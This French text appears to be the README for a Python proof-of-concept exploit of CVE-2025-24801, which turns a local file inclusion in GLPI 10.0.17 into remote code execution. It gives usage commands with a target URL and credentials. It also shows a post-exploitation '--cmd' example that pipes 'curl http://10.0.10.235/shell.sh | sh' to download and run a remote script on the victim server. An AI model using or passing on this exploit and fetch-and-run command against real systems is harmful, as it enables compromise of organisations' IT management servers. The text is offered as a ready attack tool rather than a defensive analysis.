
Exploit Python pour CVE-2025-24801 réalisant une exécution de code à distance via une inclusion de fichier local dans GLPI 10.0.17. Inclut un mode d'exécution de commandes pour la post-exploitation.
Cet exploit utilise CVE-2025-24801 pour obtenir une exécution de code à distance (RCE) via une inclusion de fichier local (LFI) dans GLPI 10.0.17. Preuve de concept (PoC) de cette CVE avec une explication de cette vulnérabilité dans GLPI.
Certaines applications exposent le point d'accès /glpi/ (par exemple, http://172.16.11.130:8080/glpi/front/computer.form.php). Si l'application cible inclut ce point d'accès, il est nécessaire de l'ajouter au paramètre --url (par exemple, --url http://172.16.11.130:8080/glpi).
Exemple d'utilisation.
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password
Si vous avez déjà exécuté cet exploit et déclenché une RCE, vous pouvez utiliser le paramètre --cmd pour simplement exécuter la commande.
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password --cmd "curl http://10.0.10.235/shell.sh | sh"